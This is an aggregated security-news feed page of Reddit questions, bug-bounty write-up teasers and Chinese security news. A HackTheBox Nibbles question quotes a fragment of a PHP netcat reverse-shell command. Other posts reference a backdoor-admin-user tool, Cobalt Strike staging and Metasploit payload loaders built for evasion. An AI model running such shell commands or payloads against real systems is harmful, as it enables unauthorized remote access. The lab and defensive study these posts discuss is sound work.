    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]
  • Open

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]
  • Open

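    The overlooked security of NTP
    Time is something we pay the most attention to day to day and yet also the least, but attacks on the NTP time protocol can cause enormous harm and deserve our attention.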
  • Open

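    Zest and ZAP! Let's build a powerful security testing routine ⚡️
    What is Zest Zest is a JSON-based scripting language created by the Mozilla security team. It was made for easier web testing, and I often use it in ZAP when testing. Zest in ZAP Honestly, JSON is not a format that is pleasant to rewrite by hand (which is why yaml or toml is often used for config), so writing it directly feels quite inconvenient. However, when Zest is used inside ZAP, the logic can be controlled through the GUI interface, so this inconvenience goes away. Zest Structure In Zest, the script's type, parameters and so on can be specified in JSON format.
    [Cullinan #25] Plans going forward
    This is Cullinan log #25. This time it is less an update log and more a post to share my plans going forward. What is Cullinan? First, Cullinan is a toy project I started in March of last year, aimed at gathering scattered blog posts into a single wiki and maintaining it continuously. Its beginning is here. By collecting existing posts into entries and adding, one by one, topics I had not covered before, it has already grown to 41 pages. I will keep adding many more entries (there is a pile being drafted in Notion 😅), and I now also want to think a bit more about how to present them.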

  • Open

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like that title says, what advice would you give someone that will begin studying for this cert. Like is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    is the CEH and CEH Practical worth taking if I am in my junior year in computer science? will it help at least land me an interview in a company? is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )
  • Open

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]
  • Open

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Getting the E-mail of a Linkedin Profile
    Due to the Linkedin data leaks, some information such as the ID and e-mail of the user's profile was made available on… Continue reading on 100security »  ( 1 min )
  • Open

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF. Tom and Jerry cartoons, K-pop music. courses on bitcoin, and video editing. Excel for beginners. and so on.
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    SecWiki News 2022-01-07 Review
    "2021 Space Security Report" by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

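    Antivirus software market expected to reach USD 4.54 billion by 2025
    The antivirus software market is expected to reach USD 4.54 billion in 2025.  ( 1 min )
    FreeBuf Morning News | Shanghai's first digital-yuan employment subsidy is paid out; VMware fixes heap overflow vulnerability in its products
    It can verify and cross-check the corresponding data, providing information support for combating illegal and criminal activity.  ( 1 min )
    Bandit walkthrough notes [learning basic Linux commands]
    Bandit is a site for learning Linux. It uses a game-style level progression to help us learn the basic Linux commands, and is well suited to learners with little or no background. This post clears every level and records and collects the related knowledge.  ( 1 min )
    The date is set! The CIS 2021 Cybersecurity Innovation Conference, Spring edition, is coming
    The conference is officially scheduled for March 2 to 3 at the Shanghai Baohua Marriott Hotel.  ( 1 min )
    A must-read for newcomers! The difference between DOM-based XSS and reflected XSS
    This article can help newcomers better understand XSS vulnerabilities, and writing it also consolidates my own understanding of XSS. If anything is incorrect, corrections are welcome.  ( 1 min )
    FreeBuf enterprise-side group discussion | Talking about cybersecurity vendor consolidation (this issue includes a bonus topic)
    Gartner predicts that cybersecurity vendor consolidation will be one of the industry trends of 2022, and most organizations see vendor consolidation as a way to improve security.  ( 1 min )
    At the start of the new year, Tophant (斗象科技) receives its first recognition of 2022
    In the new year, Tophant will work hard on its fundamentals and, with even better products and services, better accomplish its tasks.
    FreeBuf Weekly | NoReboot malware makes iPhones fake a shutdown; hackers steal credit card information while you watch videos
    We have summarized and recommended this week's hot news, quality articles and handy tools, so that you don't miss any of this week's highlights!  ( 1 min )
    NoReboot malware makes iPhones fake a shutdown
    The technique directly simulates what happens when the user's iPhone is powered off and disables most of the physical feedback, so the iPhone looks as if it has really been shut down.  ( 1 min )
    What "methods" have hackers used to steal cryptocurrency?
    Below is a summary of the five largest cryptocurrency thefts in history, which may reveal some patterns in how cryptocurrency gets stolen.  ( 1 min )
    FinalSite hit by ransomware attack; thousands of school websites inaccessible
    In recent years, schools have become popular targets for ransomware attacks, especially K12 schools with limited security budgets.  ( 1 min )
    Huami (华米科技) is hiring senior security engineers
    Founded in 2013, Huami is a globally leading smart-wearable innovation company that, through its "cloud (health cloud services) + device (wearable terminals) + chip" strategy, hopes to use the power of technology to help everyone worldwide enjoy better sports, health and medical services.
    Security knowledge graph | Cloud-side data analysis of the Log4j incident
    Achieving precise and rapid localization of advanced threats  ( 1 min )
    A detailed look at the UAC bypass technique that uses the AppInfo RPC service
    In our earlier attack-technique analysis we introduced a relatively new UAC bypass technique used in the wild; this article analyzes its technical details in depth once more.  ( 1 min )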
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )
  • Open

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )
  • Open

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: iPhone XS (A12 chip) [Wipe data after 10 attempts is ON] Passcode: Unknown iOS Ver: 14.7 Mode: AFU WhatsApp: 2FA Active I have access to UFED, Oxygen, XRY also I have budget for more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

  • Open

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )
  • Open

    Imaging a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid due to the nature of my job i cannot work from home and was wondering if theres any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )
  • Open

    Good security certs to obtain for better progression
    Hi I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+ Microsoft Azure Fundamentals What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN. For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds) trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works but:) Among its many available locations, say for example you chose NY, USA, if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate isn’t really thousands of computers crammed in one area but people using the same VPN service. I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependant on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retrieves the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retrieve that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of limited shell has worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working at a small startup company as one of the 5 people acting as admin / engineer / architect / security people / printer fixer / security analyst. I realize that the team is quickly burnt out with the variety of tasks and mountains of unending work in this state. I talked to my boss about this and he agrees that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles must be done in house and asked me to create a plan on how many divisions we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in a small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how your organization tackled this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators groups. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs ​ Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
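    Firmware analysis in vulnerability research on a certain system by ourren; In-depth analysis of the DataCon2021 domain-name-system security track, underground-economy challenge by ourren; A brief discussion of building data security operations capability by ourren; List and full texts of the 2021 "CCF Outstanding Doctoral Dissertation Award" by ourren. For more of the latest articles, visit SecWiki  ( 2 min )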
  • Open

    Using BBRF with a focus on Reconnaissance #bugbounty
    Hello, how are you? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    One of the best-known authentication protocols in Windows environments is Kerberos (RFC 1510 for the V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

    An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278
    1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVEs 2021-42287 and 2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the vulnerabilities were weaponized into Rubeus, with help from Ceri Coburn (@_EthicalChaos_), the full ‘attack chain,’ mitigations, and some detections.... The post An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278 appeared first on TrustedSec.  ( 7 min )
  • Open

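    New APT trend: use of strategically dormant domains is rising and is hard to detect
    Attackers increasingly register domains in advance and hold them in reserve, and attacks using such strategically dormant domains are growing.  ( 1 min )
    Red Sun Security (红日安全) target range 3
    The goal is to obtain a file from the win2012 domain controller server.  ( 1 min )
    Custom-built: creating a mobile system just for white hats
    To analyze malicious samples well, this article shares a new approach: custom-building a mobile system just for white hats!  ( 1 min )
    The ten most common ATT&CK tactics and techniques
    Picus researchers collected more than 200,000 real-world threat samples from various sources, determined the tactics, techniques and procedures (TTPs) of the samples, and classified each TTP; across all samples there were more than 1.8 million ATT&CK techniques.  ( 1 min )
    FreeBuf Morning News | Scammers posing as brokers defraud investors of USD 50 million; shopping and online-loan scams are the most common
    "E-commerce order brushing lets you earn money at home with a flick of your fingers", "Follow the teacher and make big money in stocks"... Online, users often receive messages like these pushed by all kinds of apps, but behind these tempting "pies" are dangerous "traps".  ( 1 min )
    What is the SSVC mentioned in CISA's "Cybersecurity Incident and Vulnerability Response Playbooks"?
    As a new vulnerability assessment method, SSVC is characterized mainly by three orientations: toward the supply chain, toward decision outcomes, and toward practical experience.  ( 1 min )
    Cipher suites: ciphers, algorithms and negotiating security settings (part 1)
    But cipher suites do indeed play a vital role in every HTTPS connection we establish over the Internet.  ( 1 min )
    Google makes its move, "taking" Israeli cybersecurity company Siemplify for USD 500 million
    Reuters reported that Google's cloud computing division has completed its acquisition of Israeli cybersecurity company Siemplify.  ( 1 min )
    Seeking new energy, a new future for security | Official website of the first "New Forces in Cybersecurity" (网安新势力) conference goes live
    The official website of the first "New Forces in Cybersecurity" conference went live today, so sign up now!  ( 1 min )
    Honda and Acura cars affected by the millennium bug, with clocks rolling back to 2002
    Will Honda and Acura really make owners wait 7 months for this bug to be fixed?
    Researchers expose a long-lurking financial theft group: Elephant Beetle
    The group targets transaction processing systems and has been stealing funds from financial entities in Latin America for at least 4 years.  ( 1 min )
    Goodbye Script Kiddie series | JAVA security (2): JAVA decompilation techniques
    The Goodbye Script Kiddie series is a new topic on this official account that brings together code auditing, security research and vulnerability reproduction, meant to help readers understand vulnerability principles more deeply and master the thinking and techniques of vulnerability hunting. We will explain Java security technologies step by step, from the basics to more advanced material.  ( 1 min )
    Statistics: the impact and cost of cybersecurity incidents
    Software security is the foundational line of defense for cybersecurity, which also reminds us to take code security seriously from the very start of software development and to improve software security.  ( 1 min )
    Git information leaks: how they work and a summary of their exploitation
    With improper configuration, the ".git" files may be deployed directly to the production environment, which causes the git leak problem.  ( 1 min )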
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

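    Useful Extensions for Vscode
    Which code editor do you use? I was a vim user from my undergraduate days, then went through vim + geany and atom + vim, and have now switched to using vscode and vim together. (I say vim, but I actually use neovim 😅) I was curious and put up a poll, and the percentages differed far more than I expected (I was thinking about 7/3..). Anyway, moving to vscode got me looking for vscode extensions, and after installing several I'd like to share the ones I found good. Atom -> Vscode I was actually a user who was satisfied with Atom and used it well.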
  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s to some extent we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me in! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories. Physical security (login/logout time) Docs created on DMS (files opened, accessed, etc. Recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. Ldap - 389 What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads don't work with custom loaders
    Hello, I'm taking a course by Sektor7. I have the problem that, no matter which way I try, I can't get a metasploit payload executed correctly by any loader (cpp) in the course. The program runs, but there was no meterpreter session opened anymore. What I tried: Simple xor encryption and decryption Simple AES encryption and decryption Even base64 encoding doesn't work for me I also tried to research the root of the problem with no success. The source I used already was fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 the compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put the aes key and payload into the cpp, didn't work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didn't work. Note: Only the provided shellcodes by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions make them break during the encryption and compilation process? If yes, why, and how to design the loaders so they don't break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is it too late to change path?
    Hi, I have been a sysadmin for 8 years and now I am thinking of changing my career path to network & security, because I see my colleagues in the security field and started to like it more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “i know everything about you” and i thought he was just trolling. But then dude proceeded to say my name.He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should i be worried? Am i hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this manner, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non-enterprise customers. While I appreciate model recommendations, my curiosity is more about a discussion about brands / models that are positioned for the non-commercial environment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterprise market? Is there a brand that you will do almost anything to avoid? Is there a model that should be crowned as the Bernie Madoff of firewalls? I am thinking about a SOHO appliance box that: is below / around $200; is not "compile OpenBSD on it and use VI to...."; is as close to set and forget as you dare; handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports); Netflix, Gmail etc etc needs to work without configuring every client; deals with 2-4 users that think "port" has something to do with ships; VLAN capability; simple to use VPN like Wireguard. Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. Ideally things I'd like to be able to do: have workflows based on CVSS, e.g. scores of 7 and greater must be reviewed by X; CVE comments; adjusted CVSS for local env; mark/detect affected products/components; Jira integration; ingestion from Qualys/other scanners etc; integration with threat intel. Sort of like a CVE/vuln/risk specific ticketing system? At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must-have tools for bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
